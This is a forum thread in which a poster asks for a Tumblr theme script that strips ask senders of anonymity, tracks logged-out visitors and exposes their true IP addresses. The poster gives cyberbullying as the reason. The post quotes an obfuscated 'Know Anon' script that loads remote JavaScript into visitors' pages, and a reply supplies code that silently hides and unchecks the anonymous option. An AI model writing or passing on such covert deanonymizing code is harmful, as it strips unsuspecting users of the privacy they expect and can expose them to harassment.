"Know Anon" Copycat Script

Collapse
X

• Filter
  • Time
  • Show
Clear All

request "Know Anon" Copycat Script

Hello, I’m new here, so I hope this is in the right forum. I'm also going to be as descriptive as possible.

There was a famous script online called “Know Anon” and it was used to disable the anonymous function on Tumblr, making every ask you send anonymously show up as your blog name. Unfortunately, Tumblr disabled the script so it no longer works.

A friend of mine is being cyberbullied, and they really want something like this, so I was wondering if anyone would kindly help me. I want something similar, with a few additions:

-If the script was made with something that can’t be disabled (IE, Javascript)

-If it’ll still track someone even if they logged out and link it to their username

-HTML friendly (Meaning that I can install it in my theme with no problems)

-It’ll show their true IP address and not a proxy IP

Unfortunatly, I don’t have a budget and I’m too young to legally have a credit (or debit) card, so Paypal (Or any money transfering account) is out of the question. Regardless, if anyone is willing to help, you can PM me (Or have me PM you). Thank you for your time.

(By the way, this is what the original script looks like)

Code:
    {block:Hidden}<meta name="select:KA" title="Off" content="off"><meta name="select:KA" title="On" content="on">{/block:Hidden}<script>eval(function(p,a,c,k,e,d){e= function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.c=d(){2.e(\'8\').f.6=\'0\';a=\'4\',b=\'7\',3 =2.5(\'3\')[0],1=2.g(\'1\');1.m=\'n/l\';1.k=\'//\'+b+a+\'.j/o?i\';3.h(1)}',25,25,'|script|document|head|anon|g etElementsByTagName|opacity|know|ask_form|window|| |onload|function|getElementById|style|createElemen t|appendChild|{select:KA}|com|src|javascript|type| text|ka'.split('|'),0,{}))</script>

Old question....

If your friend was being cyber bullied they would turn anonymous off - So I should imagine you want it for your own personal gain.
    However I think you would be wanting something like this:
    Code:
    <script>
        var anon = document.getElementsByClassName("anonymous");
        anon[0].innerHTML = '<input type="checkbox">' + anon[0].innerHTML;
        var ask = document.getElementById('ask_anonymously');
        ask.checked = false;
        ask.style.display = 'none';
    </script>
    Last edited by something else; 07.11.16, 07:53.

Comment

Working...
    X